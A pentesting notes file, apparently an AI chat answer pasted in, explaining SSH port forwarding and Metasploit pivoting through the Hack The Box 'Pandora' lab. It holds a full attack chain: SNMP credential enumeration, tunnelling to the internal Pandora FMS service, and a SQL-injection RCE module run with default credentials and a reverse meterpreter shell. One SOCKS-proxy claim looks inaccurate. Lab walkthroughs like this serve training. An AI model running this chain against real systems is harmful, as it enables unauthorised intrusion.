ssh-tunneling.md (11961B)
1 --- 2 title: "SSH Tunneling & Port Forwarding" 3 description: "SSH local/remote/dynamic forwarding and Metasploit route/portfwd pivoting, worked end to end." 4 category: tunneling-pivoting 5 tags: [pivoting, ssh, port-forwarding] 6 tools: [SSH, Metasploit] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "vault:Misc/SSH Portfwding with metasploit .md" 10 --- 11 12 # SSH Tunneling & Port Forwarding 13 14 I'll do a deep research on SSH tunneling with Metasploit, specifically using the Pandora HTB box as a practical example to clarify the correct approach. 15 16 # SSH Tunneling with Metasploit: A Complete Guide (Pandora HTB Edition) 17 18 Your original guide is **mostly correct** for local port forwarding (`ssh -L`), but it lacks clarity on *why* things work and when to use different approaches. Let me clarify the confusion and expand with the Pandora HTB box as a practical example. 19 20 --- 21 22 ## Understanding the Pandora HTB Scenario 23 24 **The Problem:** 25 * Pandora HTB has a **Pandora FMS web application** running on `127.0.0.1:80` (localhost only) 26 * It's bound ONLY to loopback—you **cannot** access it from your attacker machine directly 27 * You gain SSH access as `daniel` user via SNMP credential leak 28 * You need to access this internal web service to exploit it 29 30 **The Solution:** SSH local port forwarding 31 32 --- 33 34 ## Part 1: SSH Local Port Forward (`ssh -L`) - The Pandora Way 35 36 ### What It Actually Does 37 38 ```bash 39 ssh -L 9001:localhost:80 daniel@10.10.11.136 40 ``` 41 42 **This creates a PORT MAPPING:** 43 * Your machine listens on `127.0.0.1:9001` 44 * Any connection to YOUR `127.0.0.1:9001` → tunneled through SSH → TARGET's `localhost:80` 45 46 **Critical Understanding:** 47 * The `localhost:80` part is resolved **from the target's perspective** 48 * You could also forward to OTHER machines the target can reach: `ssh -L 9001:10.10.10.5:80 daniel@target` 49 50 ### Verify the Tunnel 51 52 From **your machine**: 53 54 ```bash 55 curl -i http://127.0.0.1:9001/pandora_console/ 56 # Or in browser: http://127.0.0.1:9001/pandora_console/ 57 ``` 58 59 If you see the Pandora FMS login page, the tunnel works. 60 61 --- 62 63 ## Part 2: Metasploit Configuration with `ssh -L` 64 65 ### Core Principle: You're Targeting YOUR Local Endpoint 66 67 When using `ssh -L`, Metasploit connects to **your local tunnel endpoint**, NOT the remote IP. 68 69 ### Configuration for Pandora FMS Exploit 70 71 ```bash 72 msfconsole 73 use exploit/linux/http/pandora_fms_sqli_rce 74 show options 75 ``` 76 77 **Set these options:** 78 79 | Option | Value | Why | 80 |--------|-------|-----| 81 | `RHOSTS` | `127.0.0.1` | The tunnel endpoint is on YOUR localhost | 82 | `RPORT` | `9001` | YOUR local listening port (not 80!) | 83 | `SSL` | `false` | Port 80 is HTTP, not HTTPS | 84 | `TARGETURI` | `/pandora_console/` | Application base path | 85 | `USERNAME` | `admin` | Default or discovered credentials | 86 | `PASSWORD` | `pandora` | Default or discovered credentials | 87 | `Proxies` | **UNSET** | `ssh -L` is NOT a proxy | 88 89 **Commands:** 90 91 ```bash 92 set RHOSTS 127.0.0.1 93 set RPORT 9001 94 set SSL false 95 set TARGETURI /pandora_console/ 96 set USERNAME admin 97 set PASSWORD pandora 98 unset Proxies 99 ``` 100 101 --- 102 103 ## Part 3: The Critical LHOST Confusion (Reverse Shells) 104 105 ### The Two Separate Connections 106 107 When you exploit a service, there are **TWO different network connections**: 108 109 1. **Exploit Delivery** (Metasploit → Web Service): 110 * Goes through the tunnel 111 * RHOSTS=127.0.0.1, RPORT=9001 112 113 2. **Reverse Shell** (Target → Attacker): 114 * Does NOT go through the tunnel (usually) 115 * LHOST=your_real_IP (e.g., tun0 10.10.14.x) 116 117 ### LHOST Settings for Pandora HTB 118 119 ```bash 120 set LHOST 10.10.14.50 # Your tun0 VPN IP 121 set LPORT 4444 # Port where YOU listen for callback 122 ``` 123 124 **Why NOT `127.0.0.1`?** 125 * If LHOST=127.0.0.1, you're telling the target to connect to **its own** localhost 126 * The reverse shell would try to connect to itself and fail 127 128 **Why does this work without another tunnel?** 129 * The target **can reach** your VPN IP directly (10.10.14.x) 130 * Only the *web service* is localhost-only 131 * The target machine itself has normal network connectivity 132 133 ### Complete Exploit Command 134 135 ```bash 136 use exploit/linux/http/pandora_fms_sqli_rce 137 set RHOSTS 127.0.0.1 # Tunnel endpoint on YOUR machine 138 set RPORT 9001 # YOUR local port 139 set SSL false 140 set TARGETURI /pandora_console/ 141 set USERNAME admin 142 set PASSWORD pandora 143 set LHOST 10.10.14.50 # YOUR tun0 IP (for reverse shell) 144 set LPORT 4444 145 set PAYLOAD linux/x64/meterpreter/reverse_tcp 146 exploit 147 ``` 148 149 --- 150 151 ## Part 4: When to Use `ssh -D` (Dynamic SOCKS Proxy) 152 153 ### The Difference 154 155 `ssh -D` is **completely different** from `ssh -L`: 156 157 | Feature | `ssh -L` (Local Forward) | `ssh -D` (SOCKS Proxy) | 158 |---------|-------------------------|------------------------| 159 | Type | Direct port mapping | Application-level proxy | 160 | Targets | ONE specific host:port | ANY host:port through proxy | 161 | Setup | One tunnel per port | One proxy for everything | 162 | Metasploit Config | RHOSTS=127.0.0.1, no Proxies | RHOSTS=actual_target, set Proxies | 163 164 ### Creating a SOCKS Proxy 165 166 ```bash 167 ssh -D 1080 daniel@10.10.11.136 168 ``` 169 170 This creates a **SOCKS5 proxy** on YOUR `127.0.0.1:1080`. 171 172 ### Metasploit Configuration with SOCKS Proxy 173 174 **Key difference:** You now target the **actual remote host**, not 127.0.0.1: 175 176 ```bash 177 setg Proxies socks5:127.0.0.1:1080 178 set RHOSTS 10.10.11.136 # Actual target IP 179 set RPORT 80 # Actual remote port 180 set SSL false 181 ``` 182 183 **What happens:** 184 1. Metasploit connects to the SOCKS proxy at 127.0.0.1:1080 185 2. Proxy forwards the connection through SSH to 10.10.11.136:80 186 3. The target's localhost services are still unreachable (SOCKS doesn't help here) 187 188 ### When to Use SOCKS (`ssh -D`) 189 190 * **Multiple targets/ports** behind the SSH server 191 * Scanning entire internal networks 192 * Dynamic reconnaissance 193 * When you don't know which ports you'll need in advance 194 195 For Pandora HTB specifically, **`ssh -L` is simpler** because you only need one specific port. 196 197 --- 198 199 ## Part 5: Advanced Scenario - `ssh -R` (Reverse Tunnel) 200 201 ### When Target Cannot Reach You 202 203 Sometimes the target **cannot** connect back to your IP: 204 * Double NAT 205 * Firewall blocking outbound 206 * No route to your network 207 208 **Solution:** Reverse port forward 209 210 ### How `ssh -R` Works 211 212 ```bash 213 # On your machine, create reverse tunnel: 214 ssh -R 4444:localhost:4444 daniel@10.10.11.136 215 216 # In another terminal, start local listener: 217 nc -lvnp 4444 218 ``` 219 220 **What this does:** 221 * Target's `localhost:4444` → tunneled back through SSH → YOUR `localhost:4444` 222 * When target connects to its own localhost:4444, it reaches your listener 223 224 ### Metasploit with Reverse Tunnel 225 226 ```bash 227 # Terminal 1: Start handler on your machine 228 msfconsole 229 use multi/handler 230 set PAYLOAD linux/x64/shell/reverse_tcp 231 set LHOST 127.0.0.1 # Listen locally 232 set LPORT 4444 233 run 234 235 # Terminal 2: Create reverse tunnel and exploit 236 ssh -R 4444:localhost:4444 daniel@10.10.11.136 237 238 # Terminal 3: Run exploit with tunnel settings 239 msfconsole 240 use exploit/linux/http/pandora_fms_sqli_rce 241 set RHOSTS 127.0.0.1 # Web service tunnel 242 set RPORT 9001 243 set LHOST 127.0.0.1 # Target connects to its localhost 244 set LPORT 4444 # Which forwards to you via ssh -R 245 set PAYLOAD linux/x64/shell/reverse_tcp 246 exploit 247 ``` 248 249 --- 250 251 ## Part 6: Complete Pandora HTB Workflow 252 253 ### Step 1: Reconnaissance 254 255 ```bash 256 # Enumerate SNMP (finds daniel's credentials) 257 snmpwalk -v 2c -c public 10.10.11.136 258 ``` 259 260 ### Step 2: SSH Access 261 262 ```bash 263 ssh daniel@10.10.11.136 264 # Password discovered via SNMP 265 ``` 266 267 ### Step 3: Port Forward (keep this running) 268 269 ```bash 270 ssh -L 9001:localhost:80 daniel@10.10.11.136 -N 271 # -N means "don't execute commands, just forward" 272 ``` 273 274 ### Step 4: Verify Access 275 276 ```bash 277 curl http://127.0.0.1:9001/pandora_console/ 278 ``` 279 280 ### Step 5: Exploit with Metasploit 281 282 ```bash 283 msfconsole -q 284 use exploit/linux/http/pandora_fms_sqli_rce 285 286 # Access the web service via tunnel 287 set RHOSTS 127.0.0.1 288 set RPORT 9001 289 set SSL false 290 set TARGETURI /pandora_console/ 291 292 # Credentials (default or discovered) 293 set USERNAME admin 294 set PASSWORD pandora 295 296 # Reverse shell comes back directly (not through tunnel) 297 set LHOST 10.10.14.50 # Your tun0 IP 298 set LPORT 4444 299 300 # Payload 301 set PAYLOAD linux/x64/meterpreter/reverse_tcp 302 303 # No proxy needed for ssh -L 304 unset Proxies 305 306 show options 307 check 308 exploit 309 ``` 310 311 --- 312 313 ## Part 7: Common Mistakes & Fixes 314 315 ### ❌ Mistake 1: Setting RHOSTS to Target IP 316 317 ```bash 318 set RHOSTS 10.10.11.136 # WRONG with ssh -L 319 set RPORT 80 320 ``` 321 322 **Why it fails:** You're bypassing the tunnel and trying to connect directly (which is blocked). 323 324 **Fix:** 325 ```bash 326 set RHOSTS 127.0.0.1 # Your local tunnel endpoint 327 set RPORT 9001 # Your local port 328 ``` 329 330 --- 331 332 ### ❌ Mistake 2: Setting LHOST to 127.0.0.1 333 334 ```bash 335 set LHOST 127.0.0.1 # WRONG for standard reverse shell 336 ``` 337 338 **Why it fails:** Target tries to connect to its own localhost, not you. 339 340 **Fix:** 341 ```bash 342 set LHOST 10.10.14.50 # Your tun0 IP that target can reach 343 ``` 344 345 --- 346 347 ### ❌ Mistake 3: Using Proxies with `ssh -L` 348 349 ```bash 350 set Proxies socks5:127.0.0.1:1080 # WRONG with ssh -L 351 ``` 352 353 **Why it's wrong:** `ssh -L` is not a proxy, it's a direct port mapping. 354 355 **Fix:** 356 ```bash 357 unset Proxies 358 unsetg Proxies 359 ``` 360 361 --- 362 363 ### ❌ Mistake 4: Wrong SSL Setting 364 365 ```bash 366 set SSL true # WRONG when forwarding HTTP port 80 367 ``` 368 369 **Why it fails:** Metasploit tries HTTPS but port 80 speaks HTTP. 370 371 **Fix:** 372 ```bash 373 set SSL false # Match the actual protocol 374 ``` 375 376 --- 377 378 ## Part 8: Decision Tree 379 380 ### Which Tunneling Method? 381 382 ``` 383 Need to access localhost-only service? 384 │ 385 ├─ YES: Need ONE specific port? 386 │ └─ Use: ssh -L 9001:localhost:80 user@target 387 │ └─ Metasploit: RHOSTS=127.0.0.1, RPORT=9001, unset Proxies 388 │ 389 ├─ YES: Need MULTIPLE ports/hosts? 390 │ └─ Use: ssh -D 1080 user@target 391 │ └─ Metasploit: setg Proxies socks5:127.0.0.1:1080, RHOSTS=actual_IP 392 │ 393 └─ NO: Direct access works 394 └─ Just set RHOSTS=target_IP normally 395 ``` 396 397 ### Can Target Reach You for Reverse Shell? 398 399 ``` 400 Target can connect to your IP? 401 │ 402 ├─ YES (normal case): 403 │ └─ LHOST=your_tun0_IP (e.g., 10.10.14.50) 404 │ 405 ├─ NO (firewall/NAT blocks): 406 │ └─ Use: ssh -R 4444:localhost:4444 user@target 407 │ └─ LHOST=127.0.0.1 (target's localhost forwards to you) 408 │ 409 └─ UNSURE: 410 └─ Try: python3 -m http.server 8000 411 └─ On target: curl http://your_IP:8000 412 └─ If works: use your_IP, if fails: use ssh -R 413 ``` 414 415 --- 416 417 ## Part 9: Auxiliary/Scanner Modules (No LHOST Needed) 418 419 For modules that just **query** the service (no reverse shell): 420 421 ```bash 422 use auxiliary/scanner/http/http_version 423 set RHOSTS 127.0.0.1 424 set RPORT 9001 425 set SSL false 426 unset Proxies 427 run 428 ``` 429 430 **Notice:** No LHOST/LPORT because there's no reverse connection. 431 432 --- 433 434 ## Summary Table: Metasploit Settings by Tunnel Type 435 436 | Tunnel Type | RHOSTS | RPORT | Proxies | LHOST (if reverse shell) | 437 |-------------|--------|-------|---------|--------------------------| 438 | `ssh -L 9001:localhost:80` | `127.0.0.1` | `9001` | **unset** | Your real IP (10.10.14.x) | 439 | `ssh -D 1080` | Actual target IP | Actual port | `socks5:127.0.0.1:1080` | Your real IP (10.10.14.x) | 440 | `ssh -R 4444:localhost:4444` | `127.0.0.1` (for web) | `9001` (for web) | **unset** | `127.0.0.1` (target's localhost) | 441 | No tunnel | Actual target IP | Actual port | **unset** | Your real IP (10.10.14.x) | 442 443 --- 444 445 ## What Your Original Guide Got Right 446 447 * ✅ RHOSTS=127.0.0.1 for `ssh -L` 448 * ✅ RPORT=local_listening_port for `ssh -L` 449 * ✅ Unset Proxies for `ssh -L` 450 * ✅ LHOST/LPORT mostly not needed for scanner modules 451 452 ## What It Missed 453 454 * ❌ **WHY** RHOSTS is 127.0.0.1 (it's YOUR local endpoint) 455 * ❌ LHOST for reverse shells (needs your real IP) 456 * ❌ When to use `ssh -D` vs `ssh -L` 457 * ❌ `ssh -R` for when target can't reach you 458 * ❌ The distinction between "accessing service" and "receiving reverse shell" 459 460 --- 461 462 This guide should clear up the confusion. The Pandora HTB example is perfect for understanding these concepts because it demonstrates the exact scenario where `ssh -L` shines.